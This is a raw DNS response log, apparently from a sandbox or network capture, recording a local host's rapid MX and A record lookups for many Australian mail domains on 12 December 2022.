                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.300054073 CET8.8.8.8192.168.2.30x1704No error (0)optusnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.324894905 CET8.8.8.8192.168.2.30x6279No error (0)extmail.optusnet.com.au211.29.133.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.329600096 CET8.8.8.8192.168.2.30x917cNo error (0)janellis-com-au.mail.protection.outlook.com104.47.71.202A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.329600096 CET8.8.8.8192.168.2.30x917cNo error (0)janellis-com-au.mail.protection.outlook.com104.47.71.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.399085999 CET8.8.8.8192.168.2.30x74acNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.399085999 CET8.8.8.8192.168.2.30x74acNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.399085999 CET8.8.8.8192.168.2.30x74acNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.420600891 CET8.8.8.8192.168.2.30xff62No error (0)mta6.am0.yahoodns.net67.195.204.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.420600891 CET8.8.8.8192.168.2.30xff62No error (0)mta6.am0.yahoodns.net67.195.204.79A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.420600891 CET8.8.8.8192.168.2.30xff62No error (0)mta6.am0.yahoodns.net67.195.228.109A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.420600891 CET8.8.8.8192.168.2.30xff62No error (0)mta6.am0.yahoodns.net67.195.204.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.420600891 CET8.8.8.8192.168.2.30xff62No error (0)mta6.am0.yahoodns.net67.195.228.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.420600891 CET8.8.8.8192.168.2.30xff62No error (0)mta6.am0.yahoodns.net67.195.228.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.420600891 CET8.8.8.8192.168.2.30xff62No error (0)mta6.am0.yahoodns.net98.136.96.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.420600891 CET8.8.8.8192.168.2.30xff62No error (0)mta6.am0.yahoodns.net67.195.204.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.496499062 CET8.8.8.8192.168.2.30x7c93No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.496499062 CET8.8.8.8192.168.2.30x7c93No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.496499062 CET8.8.8.8192.168.2.30x7c93No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.517375946 CET8.8.8.8192.168.2.30x2e86No error (0)mta7.am0.yahoodns.net67.195.204.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.517375946 CET8.8.8.8192.168.2.30x2e86No error (0)mta7.am0.yahoodns.net98.136.96.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.517375946 CET8.8.8.8192.168.2.30x2e86No error (0)mta7.am0.yahoodns.net67.195.228.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.517375946 CET8.8.8.8192.168.2.30x2e86No error (0)mta7.am0.yahoodns.net67.195.228.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.517375946 CET8.8.8.8192.168.2.30x2e86No error (0)mta7.am0.yahoodns.net67.195.228.94A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.517375946 CET8.8.8.8192.168.2.30x2e86No error (0)mta7.am0.yahoodns.net67.195.204.79A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.517375946 CET8.8.8.8192.168.2.30x2e86No error (0)mta7.am0.yahoodns.net67.195.204.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.517375946 CET8.8.8.8192.168.2.30x2e86No error (0)mta7.am0.yahoodns.net67.195.204.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.557838917 CET8.8.8.8192.168.2.30xc1b2No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.557838917 CET8.8.8.8192.168.2.30xc1b2No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.557838917 CET8.8.8.8192.168.2.30xc1b2No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.576406956 CET8.8.8.8192.168.2.30x4977No error (0)mta7.am0.yahoodns.net67.195.204.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.576406956 CET8.8.8.8192.168.2.30x4977No error (0)mta7.am0.yahoodns.net67.195.204.79A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.576406956 CET8.8.8.8192.168.2.30x4977No error (0)mta7.am0.yahoodns.net67.195.228.109A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.576406956 CET8.8.8.8192.168.2.30x4977No error (0)mta7.am0.yahoodns.net98.136.96.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.576406956 CET8.8.8.8192.168.2.30x4977No error (0)mta7.am0.yahoodns.net67.195.204.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.576406956 CET8.8.8.8192.168.2.30x4977No error (0)mta7.am0.yahoodns.net98.136.96.76A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.576406956 CET8.8.8.8192.168.2.30x4977No error (0)mta7.am0.yahoodns.net67.195.228.111A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.576406956 CET8.8.8.8192.168.2.30x4977No error (0)mta7.am0.yahoodns.net67.195.228.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.642405987 CET8.8.8.8192.168.2.30xf4baNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.642405987 CET8.8.8.8192.168.2.30xf4baNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.642405987 CET8.8.8.8192.168.2.30xf4baNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.665482998 CET8.8.8.8192.168.2.30xcc92No error (0)mta6.am0.yahoodns.net98.136.96.76A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.665482998 CET8.8.8.8192.168.2.30xcc92No error (0)mta6.am0.yahoodns.net67.195.204.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.665482998 CET8.8.8.8192.168.2.30xcc92No error (0)mta6.am0.yahoodns.net67.195.228.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.665482998 CET8.8.8.8192.168.2.30xcc92No error (0)mta6.am0.yahoodns.net67.195.228.109A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.665482998 CET8.8.8.8192.168.2.30xcc92No error (0)mta6.am0.yahoodns.net98.136.96.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.665482998 CET8.8.8.8192.168.2.30xcc92No error (0)mta6.am0.yahoodns.net98.136.96.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.665482998 CET8.8.8.8192.168.2.30xcc92No error (0)mta6.am0.yahoodns.net67.195.204.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.665482998 CET8.8.8.8192.168.2.30xcc92No error (0)mta6.am0.yahoodns.net67.195.204.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.754717112 CET8.8.8.8192.168.2.30x3f03No error (0)iprimus.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.754717112 CET8.8.8.8192.168.2.30x3f03No error (0)iprimus.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.773118973 CET8.8.8.8192.168.2.30xf7e5No error (0)mx.syd.iprimus.com.au203.134.71.81A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.843913078 CET8.8.8.8192.168.2.30x2536No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.843913078 CET8.8.8.8192.168.2.30x2536No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.843913078 CET8.8.8.8192.168.2.30x2536No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.864356041 CET8.8.8.8192.168.2.30xdc91No error (0)mta6.am0.yahoodns.net67.195.204.79A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.864356041 CET8.8.8.8192.168.2.30xdc91No error (0)mta6.am0.yahoodns.net98.136.96.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.864356041 CET8.8.8.8192.168.2.30xdc91No error (0)mta6.am0.yahoodns.net98.136.96.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.864356041 CET8.8.8.8192.168.2.30xdc91No error (0)mta6.am0.yahoodns.net67.195.204.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.864356041 CET8.8.8.8192.168.2.30xdc91No error (0)mta6.am0.yahoodns.net67.195.228.109A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.864356041 CET8.8.8.8192.168.2.30xdc91No error (0)mta6.am0.yahoodns.net67.195.228.111A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.864356041 CET8.8.8.8192.168.2.30xdc91No error (0)mta6.am0.yahoodns.net98.136.96.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.864356041 CET8.8.8.8192.168.2.30xdc91No error (0)mta6.am0.yahoodns.net67.195.204.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.929074049 CET8.8.8.8192.168.2.30x469No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.929074049 CET8.8.8.8192.168.2.30x469No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.929074049 CET8.8.8.8192.168.2.30x469No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.948520899 CET8.8.8.8192.168.2.30x3c02No error (0)mta6.am0.yahoodns.net98.136.96.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.948520899 CET8.8.8.8192.168.2.30x3c02No error (0)mta6.am0.yahoodns.net98.136.96.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.948520899 CET8.8.8.8192.168.2.30x3c02No error (0)mta6.am0.yahoodns.net67.195.228.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.948520899 CET8.8.8.8192.168.2.30x3c02No error (0)mta6.am0.yahoodns.net67.195.204.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.948520899 CET8.8.8.8192.168.2.30x3c02No error (0)mta6.am0.yahoodns.net67.195.228.111A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.948520899 CET8.8.8.8192.168.2.30x3c02No error (0)mta6.am0.yahoodns.net67.195.228.109A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.948520899 CET8.8.8.8192.168.2.30x3c02No error (0)mta6.am0.yahoodns.net67.195.228.94A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.948520899 CET8.8.8.8192.168.2.30x3c02No error (0)mta6.am0.yahoodns.net98.136.96.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.987560987 CET8.8.8.8192.168.2.30x6ed5No error (0)iprimus.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.987560987 CET8.8.8.8192.168.2.30x6ed5No error (0)iprimus.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:54.010761023 CET8.8.8.8192.168.2.30xcb84No error (0)mx.syd.iprimus.com.au203.134.71.81A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:54.196588039 CET8.8.8.8192.168.2.30x788aNo error (0)tpg.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:54.217714071 CET8.8.8.8192.168.2.30xd97aNo error (0)asav.tpg.com.au27.32.32.10A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:54.270541906 CET8.8.8.8192.168.2.30x4960No error (0)bigpond.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:54.292583942 CET8.8.8.8192.168.2.30x267eNo error (0)extmail.bpbb.bigpond.com203.36.172.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:54.292583942 CET8.8.8.8192.168.2.30x267eNo error (0)extmail.bpbb.bigpond.com203.36.137.234A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:54.426253080 CET8.8.8.8192.168.2.30xaffeNo error (0)webone.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:54.447537899 CET8.8.8.8192.168.2.30x1be9No error (0)cusdomain.iinet.net.au203.0.178.173A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:54.457962990 CET8.8.8.8192.168.2.30x8635No error (0)iinet.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:54.457962990 CET8.8.8.8192.168.2.30x8635No error (0)iinet.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:54.466826916 CET8.8.8.8192.168.2.30xa8c2No error (0)rfi.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:54.480345011 CET8.8.8.8192.168.2.30x2b6dNo error (0)asav.iinet.net.au203.59.218.120A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:54.499686003 CET8.8.8.8192.168.2.30x95beNo error (0)rfi-com-au.mail.protection.outlook.com104.47.71.202A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:54.499686003 CET8.8.8.8192.168.2.30x95beNo error (0)rfi-com-au.mail.protection.outlook.com104.47.71.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:54.618434906 CET8.8.8.8192.168.2.30x1245No error (0)austarnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:54.711215973 CET8.8.8.8192.168.2.30xc028No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:54.711215973 CET8.8.8.8192.168.2.30xc028No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:54.711215973 CET8.8.8.8192.168.2.30xc028No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:54.731777906 CET8.8.8.8192.168.2.30xa516No error (0)mta5.am0.yahoodns.net67.195.228.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:54.731777906 CET8.8.8.8192.168.2.30xa516No error (0)mta5.am0.yahoodns.net98.136.96.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:54.731777906 CET8.8.8.8192.168.2.30xa516No error (0)mta5.am0.yahoodns.net98.136.96.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:54.731777906 CET8.8.8.8192.168.2.30xa516No error (0)mta5.am0.yahoodns.net67.195.204.79A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:54.731777906 CET8.8.8.8192.168.2.30xa516No error (0)mta5.am0.yahoodns.net67.195.204.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:54.731777906 CET8.8.8.8192.168.2.30xa516No error (0)mta5.am0.yahoodns.net98.136.96.76A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:54.731777906 CET8.8.8.8192.168.2.30xa516No error (0)mta5.am0.yahoodns.net67.195.204.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:54.731777906 CET8.8.8.8192.168.2.30xa516No error (0)mta5.am0.yahoodns.net98.136.96.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:54.793215036 CET8.8.8.8192.168.2.30x36b6No error (0)shoalhaven.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:54.816802025 CET8.8.8.8192.168.2.30x477eNo error (0)hallie.shoalhaven.net.au203.17.235.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:54.875423908 CET8.8.8.8192.168.2.30xdaa5No error (0)aapt.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:54.877377987 CET8.8.8.8192.168.2.30x4d72No error (0)mail.austarnet.com.au143.95.39.218A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:54.900019884 CET8.8.8.8192.168.2.30x1dd7No error (0)asav.iinet.net.au203.59.218.120A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:54.903141022 CET8.8.8.8192.168.2.30x6073No error (0)corptech.qld.gov.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:54.947442055 CET8.8.8.8192.168.2.30xca38No error (0)corptech-qld-gov-au.mail.protection.outlook.com104.47.71.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:54.947442055 CET8.8.8.8192.168.2.30xca38No error (0)corptech-qld-gov-au.mail.protection.outlook.com104.47.71.202A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:54.989455938 CET8.8.8.8192.168.2.30x9adNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:54.989455938 CET8.8.8.8192.168.2.30x9adNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:54.989455938 CET8.8.8.8192.168.2.30x9adNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:55.032207012 CET8.8.8.8192.168.2.30xa0f0No error (0)mta7.am0.yahoodns.net67.195.204.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:55.032207012 CET8.8.8.8192.168.2.30xa0f0No error (0)mta7.am0.yahoodns.net98.136.96.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:55.032207012 CET8.8.8.8192.168.2.30xa0f0No error (0)mta7.am0.yahoodns.net67.195.228.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:55.032207012 CET8.8.8.8192.168.2.30xa0f0No error (0)mta7.am0.yahoodns.net67.195.228.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:55.032207012 CET8.8.8.8192.168.2.30xa0f0No error (0)mta7.am0.yahoodns.net67.195.228.94A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:55.032207012 CET8.8.8.8192.168.2.30xa0f0No error (0)mta7.am0.yahoodns.net67.195.204.79A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:55.032207012 CET8.8.8.8192.168.2.30xa0f0No error (0)mta7.am0.yahoodns.net67.195.204.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:55.032207012 CET8.8.8.8192.168.2.30xa0f0No error (0)mta7.am0.yahoodns.net67.195.204.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:55.058922052 CET8.8.8.8192.168.2.30x62f0No error (0)optusnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:55.090341091 CET8.8.8.8192.168.2.30x473dNo error (0)extmail.optusnet.com.au211.29.133.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:55.131787062 CET8.8.8.8192.168.2.30xaaf4No error (0)optusnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:55.151982069 CET8.8.8.8192.168.2.30xd43bNo error (0)extmail.optusnet.com.au211.29.133.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:55.205986977 CET8.8.8.8192.168.2.30x7cb4No error (0)watercorporation.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:55.205986977 CET8.8.8.8192.168.2.30x7cb4No error (0)watercorporation.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:55.242966890 CET8.8.8.8192.168.2.30x2e69No error (0)cust17545-2.in.mailcontrol.com116.50.58.190A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:55.348769903 CET8.8.8.8192.168.2.30x656cNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:55.348769903 CET8.8.8.8192.168.2.30x656cNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:55.348769903 CET8.8.8.8192.168.2.30x656cNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:55.367398977 CET8.8.8.8192.168.2.30xf13No error (0)mta5.am0.yahoodns.net98.136.96.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:55.367398977 CET8.8.8.8192.168.2.30xf13No error (0)mta5.am0.yahoodns.net98.136.96.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:55.367398977 CET8.8.8.8192.168.2.30xf13No error (0)mta5.am0.yahoodns.net67.195.204.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:55.367398977 CET8.8.8.8192.168.2.30xf13No error (0)mta5.am0.yahoodns.net98.136.96.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:55.367398977 CET8.8.8.8192.168.2.30xf13No error (0)mta5.am0.yahoodns.net67.195.228.109A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:55.367398977 CET8.8.8.8192.168.2.30xf13No error (0)mta5.am0.yahoodns.net67.195.228.94A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:55.367398977 CET8.8.8.8192.168.2.30xf13No error (0)mta5.am0.yahoodns.net98.136.96.76A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:55.367398977 CET8.8.8.8192.168.2.30xf13No error (0)mta5.am0.yahoodns.net98.136.96.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:55.558840036 CET8.8.8.8192.168.2.30x2ef8No error (0)amerro.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:55.616074085 CET8.8.8.8192.168.2.30xbdebNo error (0)amerro-com-au.mail.protection.outlook.com104.47.71.202A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:55.616074085 CET8.8.8.8192.168.2.30xbdebNo error (0)amerro-com-au.mail.protection.outlook.com104.47.71.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:55.629976988 CET8.8.8.8192.168.2.30xc984Name error (3)mail.austria.comnonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:55.764549017 CET8.8.8.8192.168.2.30x6aa7No error (0)leasewise.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:55.859956026 CET8.8.8.8192.168.2.30xcce6No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:55.859956026 CET8.8.8.8192.168.2.30xcce6No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:55.859956026 CET8.8.8.8192.168.2.30xcce6No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:55.884171963 CET8.8.8.8192.168.2.30x4752No error (0)mta7.am0.yahoodns.net67.195.204.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:55.884171963 CET8.8.8.8192.168.2.30x4752No error (0)mta7.am0.yahoodns.net67.195.228.109A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:55.884171963 CET8.8.8.8192.168.2.30x4752No error (0)mta7.am0.yahoodns.net67.195.228.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:55.884171963 CET8.8.8.8192.168.2.30x4752No error (0)mta7.am0.yahoodns.net98.136.96.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:55.884171963 CET8.8.8.8192.168.2.30x4752No error (0)mta7.am0.yahoodns.net98.136.96.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:55.884171963 CET8.8.8.8192.168.2.30x4752No error (0)mta7.am0.yahoodns.net98.136.96.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:55.884171963 CET8.8.8.8192.168.2.30x4752No error (0)mta7.am0.yahoodns.net98.136.96.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:55.884171963 CET8.8.8.8192.168.2.30x4752No error (0)mta7.am0.yahoodns.net67.195.228.111A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:55.912439108 CET8.8.8.8192.168.2.30xbe63No error (0)leasewise-net-au.mail.protection.outlook.com104.47.71.202A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:55.912439108 CET8.8.8.8192.168.2.30xbe63No error (0)leasewise-net-au.mail.protection.outlook.com104.47.71.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:55.956604958 CET8.8.8.8192.168.2.30x9199No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
